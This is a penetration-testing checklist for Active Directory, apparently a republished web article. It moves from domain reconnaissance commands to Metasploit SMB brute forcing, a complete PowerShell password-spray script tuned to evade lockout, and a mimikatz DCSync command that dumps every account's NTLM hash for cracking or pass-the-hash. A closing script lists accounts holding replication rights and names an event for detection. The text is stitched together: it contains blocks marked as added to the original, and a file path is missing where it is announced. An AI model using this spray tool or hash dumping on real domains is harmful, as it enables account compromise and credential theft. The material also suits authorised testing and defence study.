A complete Active Directory Penetration Testing Checklist

This article can be helpful for testers and security experts who want to secure their network.

Active Directory, commonly called “AD”, is a directory service that Microsoft developed for Windows domain networks. Using it you can control the domain computers and the services that run on every node of your domain.

Penetration Testing Active Directory:

This section has several levels. The first level is reconnaissance of your network. Every user can enter a domain by having an account on the domain controller (DC), and all of the information below can be gathered by any ordinary AD user. A domain username has two parts: the first is the domain name and the second is your username, as the commands below show:


C:\> net user

Running this command in CMD (Command Prompt) lists the local users on your PC.

C:\> whoami

This command shows the currently logged-in user in the form domain\username.

C:\> whoami /groups

This command shows the groups the current user belongs to.

C:\> net user /domain

This command queries the domain controller and lists every user account in the Active Directory domain (without the /domain switch, net user only shows local accounts).

You can also see a user's group memberships by running:

C:\> net user [username] /domain

To get a better overview, you can use the “ADRecon” script, written by “Sense of Security”. It is a large PowerShell script (about 12 thousand lines) that gives you a good view of AD and all the information you will need.

You can download this script from GitHub.

Screenshots of the report produced by this script:

Picture2 – List of AD Groups
Picture3 – List of DNS Record Zones

When you have all the AD users, you should take a look at Group Policy. Group Policy is a feature of the Microsoft Windows NT family of operating systems that controls the working environment of user accounts and computer accounts. In Group Policy you can see settings such as the “Account Lockout Policy”.

The lockout policy protects network users from password-guessing attacks: after a set number of wrong passwords (the lockout threshold) within the observation window, the account is locked for the lockout duration. You can also see the “Password Policy”. A password policy is a set of rules designed to enhance computer security by requiring users to choose strong passwords (minimum length, complexity, history, maximum age) and use them properly.

When you have everything you need, you can execute different attacks on the users, such as:

Brute force :

For a brute-force attack on Active Directory you can use the Metasploit Framework auxiliary modules, for example:

msf > use auxiliary/scanner/smb/smb_login

In the options of this module, set USER_FILE and PASS_FILE to your username and password lists, SMBDomain to the domain name, and RHOSTS to a host with the SMB service (445/tcp) open, typically a domain controller.

Then start the module by entering the “run” command.

If you send more wrong passwords than the Account Lockout Policy allows, the account is locked and you will see the message “Account Has Been Locked Out”.

If you do this against every account, every user is locked out and you cause an outage on the network. Use the Password Policy you collected to build the password list (candidates that break the minimum length or complexity rules can be dropped), and use the lockout threshold to limit how many guesses you make per account within one observation window.
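The following script is an added example, not code from the original article, and ties the Group Policy step above to the brute-force step: it reads the lockout threshold, observation window and minimum password length straight from the domain object (the same values net accounts /domain prints), lists the enabled accounts with their bad-password counters, and then sprays a single candidate password while refusing to touch any account that the next failure would lock. It assumes a domain-joined Windows host, an ordinary domain user, and that the candidate in $Password was built from the password policy; all of those are assumptions, not details from the page.

```powershell
<#
  Added example, not code from the original article: a lockout-aware password spray.
  Assumptions (not stated on the page): it runs on a domain-joined Windows host as an
  ordinary domain user, and $Password is one candidate built from the password policy.
  Each failed bind raises the target's badPwdCount, so this makes at most one guess per
  account per run and skips accounts that the next failure would lock.
#>
param(
    [string]$Password = 'Winter2019!'   # assumption: one candidate password per run
)

# 1. The lockout and password policy is stored on the domain object; this is what the
#    Default Domain Policy GPO writes. Interval attributes are negative 100-ns ticks.
$rootDse   = [ADSI]'LDAP://RootDSE'
$domainDn  = [string]$rootDse.defaultNamingContext.Value
$domain    = [ADSI]"LDAP://$domainDn"
$threshold = [int]$domain.lockoutThreshold.Value          # 0 = lockout disabled
$windowMin = [math]::Abs($domain.ConvertLargeIntegerToInt64($domain.lockOutObservationWindow.Value)) / 600000000
$minLength = [int]$domain.minPwdLength.Value
$dnsDomain = ($domainDn -replace 'DC=', '' -replace ',', '.')   # DC=corp,DC=local -> corp.local
Write-Host "Domain $dnsDomain : lockout after $threshold failures per $windowMin min, min length $minLength"

if ($Password.Length -lt $minLength) {
    Write-Host 'Candidate is shorter than the policy minimum; it cannot be anyone''s password.'
    return
}

# 2. Enabled user accounts and their current bad-password counter (bit 2 of
#    userAccountControl = ACCOUNTDISABLE). badPwdCount is kept per DC and is not
#    replicated, so the value read from one DC is only a lower bound.
$searcher = [adsisearcher]'(&(objectCategory=person)(objectClass=user)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))'
$searcher.PageSize = 1000
[void]$searcher.PropertiesToLoad.AddRange([string[]]@('samaccountname', 'badpwdcount'))
$users = foreach ($r in $searcher.FindAll()) {
    $bad   = $r.Properties['badpwdcount']
    $count = 0
    if ($bad.Count -gt 0) { $count = [int]$bad[0] }
    [pscustomobject]@{ Name = [string]$r.Properties['samaccountname'][0]; BadPwdCount = $count }
}

# 3. One guess per user, skipping anyone the next failure would lock out. A failed
#    LDAP bind counts as a bad password exactly like a failed SMB logon does.
$results = foreach ($u in $users) {
    if ($threshold -gt 0 -and ($u.BadPwdCount + 1) -ge $threshold) {
        [pscustomobject]@{ User = $u.Name; Result = 'skipped (next failure locks out)' }
        continue
    }
    $entry = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$dnsDomain", "$($u.Name)@$dnsDomain", $Password)
    $ok = $false
    try { $null = $entry.NativeObject; $ok = $true } catch { }   # bind failure = wrong password
    $entry.Dispose()
    [pscustomobject]@{ User = $u.Name; Result = $(if ($ok) { 'VALID' } else { 'invalid' }) }
}

$results | Where-Object { $_.Result -eq 'VALID' }
Write-Host ("Tried {0} accounts; wait {1} minutes before spraying the next password." -f @($results).Count, $windowMin)
```

Run it once per candidate password and wait one observation window between runs; that keeps every account at most one failure below the threshold, which is the difference between a password spray and the network-wide lockout described above.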

All domain password hashes are stored on the domain controller in a file named “NTDS.dit”, in this location:


You can extract the hashes with mimikatz. Its DCSync feature does not read the file directly: it uses the Directory Replication Service (DRS) protocol to ask a domain controller to replicate the password hashes, so it needs an account that holds the replication rights (normally a Domain Admin), not the low-privileged user of the earlier steps. You can run it as shown below:
mimikatz # lsadump::dcsync /domain:pentestlab.local /all /csv

The CSV output lists each account with its NTLM hash, which you can crack offline or use directly for pass-the-hash; DCSync does not normally return cleartext passwords.
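Because DCSync only works for principals that hold the replication rights, the check a tester (or the defender reading the report) wants next is who those principals are. The script below is an added example, not code from the original article or from mimikatz: it walks the ACL of the domain object and prints every principal allowed to replicate, either through the replication control-access rights themselves, through all extended rights, through GenericAll, or through WriteDacl/WriteOwner (which lets a principal grant itself the rights). It assumes a domain-joined Windows host and any authenticated domain user; reading the domain object's ACL needs no special privilege and no RSAT module.

```powershell
<#
  Added example, not code from the original article: list the principals that hold the
  replication rights DCSync relies on (the control-access rights the DC checks when
  mimikatz asks it to replicate). Assumption: it runs on a domain-joined Windows host
  as any authenticated user; the domain object's ACL is readable without RSAT.
#>
# Control-access right GUIDs for directory replication, as defined in the AD schema.
$replicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}
$allRightsGuid = '00000000-0000-0000-0000-000000000000'   # ExtendedRight with empty ObjectType = every extended right
$ar = [System.DirectoryServices.ActiveDirectoryRights]

function Get-DcSyncPrincipals {
    $rootDse = [ADSI]'LDAP://RootDSE'
    $domain  = [ADSI]"LDAP://$($rootDse.defaultNamingContext.Value)"
    $rules   = $domain.ObjectSecurity.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])
    foreach ($rule in $rules) {
        if ($rule.AccessControlType -ne 'Allow') { continue }
        $rights = $rule.ActiveDirectoryRights
        $guid   = $rule.ObjectType.ToString()
        $why    = $null
        if (($rights -band $ar::GenericAll) -eq $ar::GenericAll) {
            $why = 'GenericAll'
        } elseif (($rights -band ($ar::WriteDacl -bor $ar::WriteOwner)) -ne 0) {
            $why = 'WriteDacl/WriteOwner (can grant itself the rights)'
        } elseif (($rights -band $ar::ExtendedRight) -ne 0) {
            if ($guid -eq $allRightsGuid)                 { $why = 'All extended rights' }
            elseif ($replicationRights.ContainsKey($guid)) { $why = $replicationRights[$guid] }
        }
        if (-not $why) { continue }
        # Resolve the SID to a name where possible; keep the raw SID for orphaned entries.
        $sid  = $rule.IdentityReference
        $name = $sid.Value
        try { $name = $sid.Translate([System.Security.Principal.NTAccount]).Value } catch { }
        [pscustomobject]@{ Principal = $name; Right = $why; Inherited = $rule.IsInherited }
    }
}

# On a default domain you expect the domain controller groups, Administrators and the
# admin groups that hold GenericAll. A service account, a plain user or a broad group
# such as Authenticated Users in this list is a finding.
Get-DcSyncPrincipals | Sort-Object Principal, Right | Format-Table -AutoSize
```

On the defensive side, every DCSync also produces Security event 4662 on the domain controller with one of the GUIDs above in its Properties field; that event from any account that is not in this list is the detection.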

Source & Credits

This article was prepared by Omid Shojaei, @Dmitriy_area51, Pentester. All the content of this article belongs to the original author above. “GBHackers On Security” does not take any credit. This article is for educational purposes only. Any actions or activities related to the material contained on this website are solely your responsibility.
